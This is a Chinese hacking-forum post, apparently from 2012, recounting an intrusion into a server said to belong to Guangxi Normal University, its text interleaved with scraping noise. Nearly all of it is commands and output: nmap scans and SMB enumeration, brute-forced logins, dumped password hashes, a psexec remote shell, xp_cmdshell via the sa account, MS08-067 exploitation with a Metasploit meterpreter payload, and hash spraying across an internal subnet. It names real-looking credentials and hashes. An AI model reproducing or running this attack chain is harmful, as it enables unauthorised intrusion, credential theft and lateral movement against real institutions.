中国网络渗透测试联盟

标题: nmap+msf入侵广西师范 [打印本页]

作者: admin    时间: 2012-12-4 12:46
标题: nmap+msf入侵广西师范
广西师范网站http://202.103.242.241/6 K9 m4 b9 ]  @5 M: D8 d2 m
$ G" ]6 p) v6 c
root@bt:~# nmap -sS -sV 202.103.242.241
/ U3 e; H! e0 q! m6 {. Z7 K9 ~: o! i4 o5 D5 k7 D- m
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 21:54 CST# f# n4 ^5 Y, i3 ]+ k! m
7 R. a  B# k/ F9 ]) p% U9 G
Nmap scan report for bogon (202.103.242.241)" a# S+ w* n) w& c& O/ r

. }/ w( H  A* I4 ]" J3 L: ~Host is up (0.00048s latency).$ F5 X: z" u& V4 {9 ]" L

* I% r. V  R, U' }2 X& R( ANot shown: 993 closed ports, L) t# Z- ]3 j

+ z; g: L/ G' G, ePORT     STATE SERVICE       VERSION
8 ?2 \# H% e1 w! T! ~$ i9 o. |! Q
$ O9 j) R# t- V2 \, @135/tcp  open  mstask        Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)0 P) N8 d/ H$ J& B% g6 K+ h

( M6 Z2 u' }5 Y, l! }6 i139/tcp  open  netbios-ssn/ ]+ \/ e8 I) v& Z/ @8 s1 H
4 X+ D5 Y4 ^& w+ ?1 Q1 _  E3 N% G
445/tcp  open  microsoft-ds  Microsoft Windows 2000 microsoft-ds
' V4 x6 a* U' W, r; L3 _, T
: k  C* R; ~" t! I0 e1 K% B1025/tcp open  mstask        Microsoft mstask (task server – c:\winnt\system32\Mstask.exe)
: f) R- p* a- O0 v1 {8 ]( T. ]& x1 D
1026/tcp open  msrpc         Microsoft Windows RPC0 W5 A0 [3 }% f

6 J1 S& ^* I% v0 X4 r  H8 Z( [3372/tcp open  msdtc?: R) w" H, }9 S$ F. \+ o7 x
$ s5 ~8 T5 ]! @
3389/tcp open  ms-term-serv?
, g5 H* @( b% W8 r! `1 g' g  \8 o1 b' @# j3 K
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at http://www.insecure.org/cgi-bin/servicefp-submit.cgi :
9 X: Y! R; l: Z. K, s; x# kSF-Port3372-TCP:V=5.59BETA1%I=7%D=2/28%Time=4F4CDC90%P=i686-pc-linux-gnu%r
7 S; D* u6 d" D( H* I7 P7 Q  f$ H/ Q) \; E4 N/ F5 B) s7 q
SFGetRequest,6,”hO\n\x000Z”)%r(RTSPRequest,6,”hO\n\x000Z”)%r(HTTPOptions
5 v9 l; [- T/ p2 ]
$ d6 q& T$ c' w$ H& e4 FSF:,6,”hO\n\x000Z”)%r(Help,6,”hO\n\x000Z”)%r(SSLSessionReq,6,”hO\n\x000Z”)
9 j6 ^6 T1 c. ]  q0 u( R" c: s4 q- S
; ^5 g* y9 ^- ]  ]; u" F+ sSF:%r(FourOhFourRequest,6,”hO\n\x000Z”)%r(LPDString,6,”hO\n\x000Z”)%r(SIPO
$ v# D; {4 A" {2 Z% `/ ]' X' ?
3 _/ o( f) J$ s0 ySF:ptions,6,”hO\n\x000Z”);
0 H3 |. G2 w% s" ]' j& a
9 D. N& M+ `3 x0 ~9 BMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)& l3 X- I7 C; m6 ^

( H( X/ O1 B4 z; h8 OService Info: OS: Windows
! X! e. _3 s8 I% `3 q% h5 p  \
5 ~, P7 O5 S% B1 O: Y5 j; zService detection performed. Please report any incorrect results at http://nmap.org/submit/ .
1 F8 j5 e1 g" I7 b1 }6 B4 W
8 ?4 u8 K; [# @6 jNmap done: 1 IP address (1 host up) scanned in 79.12 seconds" I3 P' p8 g& b! R/ |
( y% n; `0 F$ @$ a' `
root@bt:/usr/local/share/nmap/scripts# ls -la | grep smb  //列出扫描脚本
. I0 a- b  e! R5 ^' L% G
+ \2 Y9 l7 {- r. F% r! V& g& k! x" q-rw-r–r– 1 root root 44055 2011-07-09 07:36 smb-brute.nse
, X; p8 W1 X! S  y6 K. v. N& S3 L8 }7 l* L, I8 A) P3 M
-rw-r–r– 1 root root 27691 2011-07-09 07:36 smb-check-vulns.nse
6 n% i0 C3 b, j" q9 @+ Z) J* F/ z4 ]7 g" P! |
-rw-r–r– 1 root root  4806 2011-07-09 07:36 smb-enum-domains.nse
& y7 j" V! O) Q$ h; b# _. k2 I& |# o' J7 m& V( O
-rw-r–r– 1 root root  3475 2011-07-09 07:36 smb-enum-groups.nse* M4 L0 u/ ]- a2 w/ Y. s+ s* `  e

% S/ A! g* F2 `-rw-r–r– 1 root root  7958 2011-07-09 07:36 smb-enum-processes.nse
  I$ `' L- O4 [! [! u' l7 ~. |7 X& L1 i) X/ T1 Z
-rw-r–r– 1 root root 12221 2011-07-09 07:36 smb-enum-sessions.nse
. `  g  f! C7 L. M
& g+ i$ C' }! b! r8 c' P/ _-rw-r–r– 1 root root  6014 2011-07-09 07:36 smb-enum-shares.nse
& ~- U, H2 c$ j2 D" z7 f( z4 [" `9 m7 F. M
-rw-r–r– 1 root root 12216 2011-07-09 07:36 smb-enum-users.nse% h5 Q+ \4 s) W6 G3 t
4 N& R$ n  V& Q2 z0 t. x
-rw-r–r– 1 root root  1658 2011-07-09 07:36 smb-flood.nse
: a( m2 a- Z) c  D+ n+ r
. ~/ g, q) c7 q: h8 s7 l% W% `-rw-r–r– 1 root root  2906 2011-07-09 07:36 smb-os-discovery.nse
9 V" ~1 s. J3 `  K5 Y# Q: f. a* B4 m
-rw-r–r– 1 root root 61005 2011-07-09 07:36 smb-psexec.nse* p0 E4 g, V, x7 K* u

+ N1 r1 e4 [  T3 `& F-rw-r–r– 1 root root  4362 2011-07-09 07:36 smb-security-mode.nse
, g0 U7 d$ C. z* r) m- W! p& V& s: x; q& b) G* r
-rw-r–r– 1 root root  2311 2011-07-09 07:36 smb-server-stats.nse/ `! }% C' M5 S) O
, `0 k" X  t$ b( f$ |
-rw-r–r– 1 root root 13719 2011-07-09 07:36 smb-system-info.nse6 o) g) j- L% l) T

0 m. I# a9 U" C$ j# f2 f7 u; I-rw-r–r– 1 root root  1429 2011-07-09 07:36 smbv2-enabled.nse
1 V' i4 `2 n1 ~5 e$ c
7 O  ?1 t2 {- Y7 }" Vroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-users.nse 202.103.242.241   
* c8 n% U) j7 j1 h1 w
. i: @* e8 e. `//此乃使用脚本扫描远程机器所存在的账户名
+ R, O! o4 q, z  X2 c8 _3 a: ~! A( Y
Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:12 CST
  L& c) w! W& w- w4 `( u
( q9 s, o- C0 @Nmap scan report for bogon (202.103.242.241)
5 W0 T7 U* f( W' T- M5 ~" h7 q: \0 n* e+ D: e% V) W/ a
Host is up (0.00038s latency).
1 [) N, x' V5 n, K/ l6 P  h
2 A% X4 c+ R" S! U' [/ m. O: [* mNot shown: 993 closed ports
* c! K( H% n* f/ l7 E
0 |7 h9 e+ O& uPORT     STATE SERVICE
9 p, y+ F  f/ a- |, ]9 I" D2 n5 V5 k1 Z' S6 W$ ]
135/tcp  open  msrpc
! K& c* t: G& p2 ^! h! V' k& w' |) T( B
139/tcp  open  netbios-ssn0 O; u. u6 }* f$ i, U  R8 M
* G% {* n( P" m
445/tcp  open  microsoft-ds3 u4 b7 s' D# j9 q7 e3 Q7 S

6 u/ D' e7 ?# I/ f2 h1025/tcp open  NFS-or-IIS5 v* l( m$ s& H9 Z8 I; X8 p5 \

4 ^. \9 Q2 [, N1026/tcp open  LSA-or-nterm
" Y- v7 o8 G: j) H; K- K1 o
; {6 r2 v! x$ P6 K( F# g( X3372/tcp open  msdtc
3 U# ?/ o( c- P4 f4 W4 L$ [; \5 F5 N  {  C, ^2 e
3389/tcp open  ms-term-serv+ O9 j$ N. b$ b3 L7 @
) f+ X2 W. c4 [4 i' a, R
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
6 w& c% e* R" k! {& B7 Z2 d; I) Y' ^% B0 b, E$ I
Host script results:
2 l& g6 [  h8 {2 e4 H" w4 ^# V
% d# o, c- ?+ n, G8 p7 |  n| smb-enum-users:
6 A9 I1 Y- f  |  {
% h  B1 `4 R0 d1 g$ }% b|_  Domain: PG-F289F9A8EF3E; Users:Administrator, Guest, test, TsInternetUser //扫描结果
& ~  ^7 H& c, ~1 b1 \1 G) s0 W" t- |& w5 L
Nmap done: 1 IP address (1 host up) scanned in 1.09 seconds
" T# |7 C" \+ W4 m# ?( c0 `# {! h9 K' t3 m( ^7 ?) x
root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-enum-shares.nse 202.103.242.241 6 `, `. Y* G# ^4 D+ i: F
6 V* S, e$ t5 h! X
//查看共享% ?3 R0 T; N# O2 H( c

+ t, o) O5 ~- j; {6 K& B8 C% wStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:15 CST
, W- P6 `2 B/ [- O1 D& ?0 m9 A- h
9 e+ @8 h/ M7 h' \# \Nmap scan report for bogon (202.103.242.241)
9 E4 t# c# s6 H9 E, X* H/ T: C$ O* d( e% }! s6 D
Host is up (0.00035s latency).6 _2 t  T/ ~! m
( f/ w4 u1 c) G& l
Not shown: 993 closed ports
+ y2 k2 i" u' t1 B9 J
! d# S2 w1 `7 B$ f" JPORT     STATE SERVICE  T  j4 O2 W  ]1 w! s

: S" ^& f$ Y  M135/tcp  open  msrpc
" H7 a8 _" Y" f7 B' \9 q  F& @) J% ^4 s0 F. H3 W- H7 o
139/tcp  open  netbios-ssn
5 Z1 T% R$ T0 p( e) ]0 p  o
3 @# \/ C- s1 L( G6 j' n  s2 X; p445/tcp  open  microsoft-ds+ W& m6 f8 l# y$ l8 W3 J

6 }* C1 K7 {0 h# k3 S5 R6 _9 U. V1025/tcp open  NFS-or-IIS# J& a' W0 O3 Z- W4 w4 {5 Y; g
* V" W* D: _* K5 H6 q$ `9 V) D
1026/tcp open  LSA-or-nterm% S( a3 a8 W9 I; L; Z: r4 e( ?! i. n
, f( u2 Y, Y# ~% D* d7 [
3372/tcp open  msdtc- c. f$ ?5 q& P! Z/ s

8 T* I% b6 n+ T! Y. S& b5 J3389/tcp open  ms-term-serv, O- J! s& G  E, M& }
3 n9 K6 M' v, ^+ H
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)+ P% L9 z3 D1 k' O/ k- p

# m+ E, w* f3 ~+ H. L. bHost script results:
+ w5 `/ a9 Z# M! h3 [- h
8 J; J( f- u- u* @6 c2 Y| smb-enum-shares:3 F9 ?5 Q9 ]1 r( ~$ c2 c

( `- B/ _0 N2 L5 w# K|   ADMIN$
9 T. a- c! u( C6 I: @2 `* a
7 D5 S: u- j5 b! X3 Z& p0 f|     Anonymous access: <none>
3 c' J$ v5 B8 X  q5 k
9 x  f8 b/ m/ F7 S5 {|   C$
* n% k- n* j6 R6 i# ]7 \( r  M! X; W! r
|     Anonymous access: <none>) R* r1 f* u' Y; S

$ Z6 v: x. V3 X) ^8 N|   IPC$3 W$ G- a# h8 t- q' y: m
0 `, z) v2 J7 ]9 \0 L
|_    Anonymous access: READ
9 v( o; A$ H  `+ a+ A
3 \0 ]0 ~$ N6 d0 }& g2 gNmap done: 1 IP address (1 host up) scanned in 1.05 seconds( |6 f: m# e& [) c

) Q* c- n- a3 ~- m0 ]root@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse 202.103.242.241       # v8 y9 W/ K* D1 ?
% u! n. ^8 E8 `  v- h
//获取用户密码
" N6 o( d$ K1 J+ r! c0 p/ L
; U2 `: c- e5 ]9 t$ o) G' q& }  xStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-28 22:17 CST# O2 h! h* h- A
+ h6 \& |  z" a7 X- y4 n1 C
Nmap scan report for bogon (202.103.242.2418)
* t! S& h, e) b9 Z+ j9 ^
/ s* ^- ?9 O0 _5 t9 |% @Host is up (0.00041s latency).7 m* u# w, B2 c, f2 e0 h2 k

6 f9 r6 X3 N( l% c  CNot shown: 993 closed ports5 g3 o0 {. m) T5 U8 t  j
% @! d6 X) h8 V& ^) X6 e' z2 c' j
PORT     STATE SERVICE
4 \. O/ z$ e6 e2 J% {
/ |* X9 V" u3 O* [3 K  T135/tcp  open  msrpc. J3 M6 ^& j2 Z0 D- A- G+ Q) h
7 F7 }) j" c! N% G. K& G
139/tcp  open  netbios-ssn
! k& K& M9 `0 j# G! C& |1 v9 o8 {; v
445/tcp  open  microsoft-ds
8 [7 f( J7 f% r
- C! o) Q9 W9 ?0 E- b8 ^3 ]8 q, W, B1025/tcp open  NFS-or-IIS8 _4 u" q1 T/ C8 V3 k; z% Y
9 W( v# |: y* j& d2 F
1026/tcp open  LSA-or-nterm! p" @, A1 k0 v: }) T# g

8 q+ i9 N0 H, h& s3372/tcp open  msdtc( L+ f2 ~3 f4 @" f1 T/ A

8 [, N0 S- V" h8 U8 p) Z+ [3389/tcp open  ms-term-serv
, @+ ^0 `1 M; n, l
: l' r7 z$ o& ~1 R5 uMAC Address: 08:00:277:2E:79 (Cadmus Computer Systems): m* k) N) N4 P4 w( m5 |
; h: K; j0 r1 U! T
Host script results:
, c/ m* U$ f/ X7 t& {& d# H3 I# i9 j5 ]( u5 {' `( u( X, P
| smb-brute:
" C/ |) `, y- b) O2 |) O) s$ J* Y( b+ M3 `, P- [
administrator:<blank> => Login was successful* a" J) [# W9 c- L, u8 A

+ D3 `9 }( K: _4 ~' U|_  test:123456 => Login was successful
- g: S7 _1 x& S4 U4 U8 `6 d* f8 k" q' }. r7 e) ^
Nmap done: 1 IP address (1 host up) scanned in 28.22 seconds0 H3 v6 C: f7 m: g9 u9 o+ \
, Q% m4 K% U5 E! p
root@bt:~# wget http://swamp.foofus.net/fizzgig/ ... -exe-only.tar.bz2//抓hash
; e7 h* B, U5 e  B( A0 }/ Q
* P7 n: j. B" v" @+ Mroot@bt:~# tar -jxvf pwdump6-1.7.2-exe-only.tar.bz2 -C /usr/local/share/nmap/nselib/data: q. T7 y& A+ T, l5 [) R
3 R9 v8 `7 y9 l) Q8 ?% [
root@bt:/usr/local/share/nmap/scripts# wget https://svn.nmap.org/nmap-exp/dev/nmap/scripts/smb-pwdump.nse- H  b, ?+ Y. b( ^4 e
) E, H; d% q% Z9 U" c* a- y) c
root@bt:~# nmap –script=smb-pwdump.nse –script-args=smbuser=test,smbpass=123456 202.103.242.241 -p 135,445,139( a+ n1 C" y; y( y( b2 [

% [7 n+ j, @# K, N( e- p2 ?Starting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:25 CST, e: R0 r5 @6 C! h& V0 O2 N+ z. _
) x4 k4 n0 l  h9 ^2 ~
Nmap scan report for bogon (202.103.242.241)% C6 d3 D3 d$ U4 K
! _5 B7 {0 C# h
Host is up (0.0012s latency).
0 P! t6 _9 A1 V/ R1 k* X* N/ I+ F, I6 M: S7 A; z
PORT    STATE SERVICE
( e# M4 @+ z5 R' J9 L: O" G* D6 _6 U$ Q1 z5 e
135/tcp open  msrpc
- K: D* q( y% p# F' p$ _3 D
  [% a8 d1 Z( J5 e139/tcp open  netbios-ssn
$ v+ K5 E. h+ Q* W2 r5 P( g: d
1 G$ b. `; `& A445/tcp open  microsoft-ds
7 Q, n. o0 K9 f$ e* r
; j' q$ m7 u2 Z* s- _MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)" p$ \, q# _+ k$ R, R2 A
& S) j' j0 E0 i% G' u4 O/ l$ K7 `
Host script results:/ v3 n) P. F/ F3 Z5 O, ]" z

$ }5 @5 ^  f% s. x$ z6 P% {' g| smb-pwdump:
% Z* ^4 w& }7 m( V8 o4 ]8 |' o. P- X" P8 ^; b" H0 X( N4 Z6 t5 C
| Administrator:500 => NO PASSWORD*********************:NO PASSWORD*********************5 U4 Q# t+ M4 i
7 z0 W$ w% b* h3 A- \
| Guest:501 => NO PASSWORD*********************:NO PASSWORD*********************+ Y% {8 p% W' _7 }9 {' h) o2 k$ y. T
9 U/ Q3 u/ }* t: p) \
| test:1002 => 44EFCE164AB921CAAAD3B435B51404EE:32ED87BDB5FDC5E9CBA88547376818D4
/ c7 _1 O! |  V$ ~) A2 |, O' u( d8 |4 ~" B" L. l
|_TsInternetUser:1000 => A63D5FC7F284A6CC341A5A0240EF721E:262A84B3E8D4B1CC32131838448C98D2( y! y# c- b# B" k7 R
% J% I2 X. v% F* N) A( d, P
Nmap done: 1 IP address (1 host up) scanned in 1.85 seconds! m" H* [) q; m. H% q
" M! Q8 b& j/ v6 D3 _( A
C:\Documents and Settings\Administrator\桌面>psexec.exe \\202.103.242.241  -u test             //获取一个cmdshell
! L) q+ \0 I( i. r! a7 L' _, X4 N, v/ C3 y: l% l0 L3 M
-p 123456 -e cmd.exe% X$ K; M7 Y0 \  p6 e; p
9 s" G' S: i8 e9 B
PsExec v1.55 – Execute processes remotely2 \& [0 {& R; W. b2 s
* o" M8 l$ F3 I" X# I: X  ~
Copyright (C) 2001-2004 Mark Russinovich
- x$ f7 V6 ?1 L. o! Z1 R9 x/ |6 A: h# {* O. \% a" |& Y
Sysinternals – www.sysinternals.com5 B5 `4 ~) l3 E( q8 ^

6 g% n$ T$ S" ], J( M* ]Microsoft Windows 2000 [Version 5.00.2195]* L! A, G7 c; c$ P8 k  F

4 Q2 O; J$ S* n7 W. P(C) 版权所有 1985-2000 Microsoft Corp.( `, D/ Y, q/ H( \
2 Z5 O. t- V9 l9 Q' R% K* l$ ?
C:\WINNT\system32>ipconfig
" i6 T% t7 v: P& [" G1 ?2 |5 X6 ]2 G! ~6 }6 l0 a7 ]3 Y0 ^
Windows 2000 IP Configuration
. C% G0 D. {- C
) Z3 \* z4 a1 x( k- D5 z. h$ CEthernet adapter 本地连接:. a" h8 s4 e& \- z  d. H4 z

( {, ^" z- M4 Y. g9 P( nConnection-specific DNS Suffix  . :
! J6 q9 E+ l# H$ X2 u# W7 U
( B8 B$ \! e. E) gIP Address. . . . . . . . . . . . : 202.103.242.2410 M9 c! @5 k0 j( V4 ?

* j, z8 Z7 Y+ h" iSubnet Mask . . . . . . . . . . . : 255.255.255.0% K% ?6 i& [2 Z6 D% [( R3 S
0 D# W" C0 i' ^2 ]1 }
Default Gateway . . . . . . . . . : 202.103.1.1
/ l' K) s! a) `: A4 r8 Z- C; L
* z0 v5 B+ s, \C:\Documents and Settings\Administrator\桌面\osql>osql.exe -S 202.103.242.241 -U sa -P “123456″ -Q “exec master..xp_cmdshell 'net user' “   //远程登录sa执行命令8 }0 d2 q9 V% ]9 ^

" \8 n6 |( V5 J, N' b& V& Rroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-check-vulns.nse 202.103.242.241     //检测目标机器漏洞1 g1 V7 t0 U' p+ \

9 R6 m! I; h0 o, [3 @/ zStarting Nmap 5.59BETA1 ( http://nmap.org ) at 2012-02-29 00:41 CST
" J# H- l2 ?2 W/ v" l0 P% X% |3 n5 |; n/ c% m! T- x# @
Nmap scan report for bogon (202.103.242.241)
) _+ E3 v5 W/ d& \7 W* C$ \) |0 a( V
0 W" i/ O" C6 [1 Y8 Z" H9 C! yHost is up (0.00046s latency).$ w* \7 F" e7 A
8 u& F4 A+ X0 L8 W( B& g4 ?% r
Not shown: 993 closed ports* l! |$ z  G1 ^3 ?

- L6 `* y, A" F0 ^: BPORT     STATE SERVICE
  K; m/ O4 M3 L; J. V4 f( \5 _# V7 s; I# e
135/tcp  open  msrpc+ v7 {- J$ u7 L/ m
0 \) t5 ^5 j7 N& [3 \
139/tcp  open  netbios-ssn! `4 p& y. B# D% t

! t# s3 g0 d4 x445/tcp  open  microsoft-ds/ F; z* ?* P, V& w; H' {

% N' Y6 F* B, H" a9 D1025/tcp open  NFS-or-IIS
5 ]* z$ \" G6 O9 C9 e* R9 {' o# V% |( @: G8 Q( L1 t/ h
1026/tcp open  LSA-or-nterm
0 m- L2 _6 {0 r9 Z1 G
9 U$ p9 d* _' f3372/tcp open  msdtc  r1 H8 y3 G- g" q

# l/ }( Y8 [3 ~; `& n0 L* j2 H3389/tcp open  ms-term-serv7 i/ ~1 w& X/ d1 M9 V

4 I- b1 }+ `0 v8 j; j( F- X9 |MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)
! f9 _: H  W. j- [$ ~) j& o  D; i- U8 [# p5 h, }4 N
Host script results:
. W- X4 }) C; s9 [3 ]5 |- j# d/ k1 I3 t% o/ _
| smb-check-vulns:
$ D% T2 |' E8 b) `, W! R' A& ^: A" n9 m& }3 Z- E
|_  MS08-067: VULNERABLE+ j% _4 t( V& T4 T8 W
( ?+ w8 S6 g; y' {3 H; \# o4 i
Nmap done: 1 IP address (1 host up) scanned in 1.43 seconds
) q* ~  y) _; i9 n9 z/ D3 }. G& Q9 f  F6 W+ m1 e3 }
root@bt:~# msfconsole                                             //在msf上利用ms08-067漏洞对目标机器进行溢出6 ~7 h+ T, C) N) w! B2 V& R

! d8 F( d) Q3 O* t% nmsf > search ms087 A% q* o0 D/ K* m
# d4 f; h9 q' ^$ O# t8 E4 X- N
msf > use exploit/windows/smb/ms08_067_netapi
/ S9 [9 X% ^$ ?5 h
' _4 i5 ?% q7 h! qmsf  exploit(ms08_067_netapi) > show options
' W1 K* B; ^: o8 B' j0 D* l
, R0 u9 u' K9 D5 p5 wmsf  exploit(ms08_067_netapi) > set RHOST 202.103.242.241& z5 Y  V! W5 S, O' V
8 [- I! @8 q. `( w& u# U. o( ]
msf  exploit(ms08_067_netapi) > show payloads
' u' A2 u( D$ z- W0 c0 J/ y" N1 B0 f8 R  C- C
msf  exploit(ms08_067_netapi) > set PAYLOAD windows/meterpreter/bind_tcp" f5 H4 j9 R# K, M4 u$ Y0 T; l

2 T' C. h. R+ k: p! Amsf  exploit(ms08_067_netapi) > exploit
& y: E  N; n. _. o4 z
2 n% o1 v$ D# jmeterpreter >9 S! C3 j7 p$ u: M# q
" }6 g3 O3 L7 E% R, H
Background session 2? [y/N]  (ctrl+z)# f" Z! l1 H* ^& R1 T7 J

/ S8 X' d$ M3 \2 }' zmsf  exploit(ms08_067_netapi) > sessions -l4 U4 G7 }3 J: e( v

% Q* f' x/ ]( P" a8 jroot@bt:/usr/local/share/nmap/scripts# vim usernames.txt) H3 |1 `& E' w0 l

0 ~9 B0 t7 ]. h  e& Xtest
% }$ o$ R' S5 e* y! W
" t1 ~( ~+ x! q0 g' eadministrator' T( e+ i- G$ u% a0 j) o( I# Z, F

- Q+ I) S9 u7 M2 e; }root@bt:/usr/local/share/nmap/scripts# vim password.txt. d2 z; D& a* h
/ e* B/ v4 O! l0 k+ G5 L# c
44EFCE164AB921CAAAD3B435B51404EE1 i3 Z5 o# Y0 H9 S  f) S, t0 y* o

; A+ T0 n; l4 q. zroot@bt:/usr/local/share/nmap/scripts# nmap –script=smb-brute.nse –script-args=userdb=usernames.txt,passdb=password.txt 192.168.1.1-254
- G4 r$ _- b' s" D; p7 u9 E* T0 w
/ M7 Y6 L8 q6 V: K3 b6 w //利用用户名跟获取的hash尝试对整段内网进行登录. v/ l) |) a& E4 H

/ o# h& y, K) h& d+ BNmap scan report for 192.168.1.1050 K& b, O. J$ R" E8 k2 _

) p- R3 B% ~2 k- J1 VHost is up (0.00088s latency).
0 ^& I2 g# u' ^9 F" U- l) @, V6 C; o- u. Q, b% P4 O* i- O
Not shown: 993 closed ports/ q$ o, L' y- e4 z9 f  y  U# W

4 @$ _) W8 f  @. E0 Z; h4 o2 kPORT     STATE SERVICE) k, }* S6 \% d0 v. B- B

& `: G: \; U/ r/ s+ t4 M135/tcp  open  msrpc: L/ S' B0 }$ I$ M; a) ?

2 C  I. A( F* d8 Q+ o; L139/tcp  open  netbios-ssn: i- |  E, @$ ^  a- q- i- L
" ~7 y* q( s# w* W
445/tcp  open  microsoft-ds
. P; J- Q4 [- t8 T4 ^3 }8 c9 t( {' {4 i, l7 F7 j
1025/tcp open  NFS-or-IIS
& v2 S. X$ {& S, a
5 l8 w% N& K& _1 v1026/tcp open  LSA-or-nterm
$ T. ]/ k6 u* U7 R3 }
, f. G9 }0 K; a6 B  L3372/tcp open  msdtc
6 l: Y; f! h9 `- ~6 W
0 a  Y5 X0 R$ Z5 ~3389/tcp open  ms-term-serv
* x3 I2 u$ Q- w) K  ]- i( g# u1 i) a4 T0 ^0 |2 b0 S) ?
MAC Address: 08:00:277:2E:79 (Cadmus Computer Systems)4 t$ |, E/ L' ]7 R* g
  |  J: n" p+ v* `3 Z
Host script results:
1 N/ @9 d1 f1 R+ _9 s+ |3 [0 n/ m3 n& r
| smb-brute:1 ?) C" v7 I+ v0 H& X

) E/ l2 k; n/ o1 `' ?|_  administrator:<blank> => Login was successful
6 H  m  u# C) P- \4 k% _$ a. r9 g7 F& O0 f/ ]+ d
攻击成功,一个简单的msf+nmap攻击~~·
( W; L" A* W/ a" H8 J3 z; u& u) ^% A. M' i6 H; K7 R0 K





欢迎光临 中国网络渗透测试联盟 (https://www.cobjon.com/) Powered by Discuz! X3.2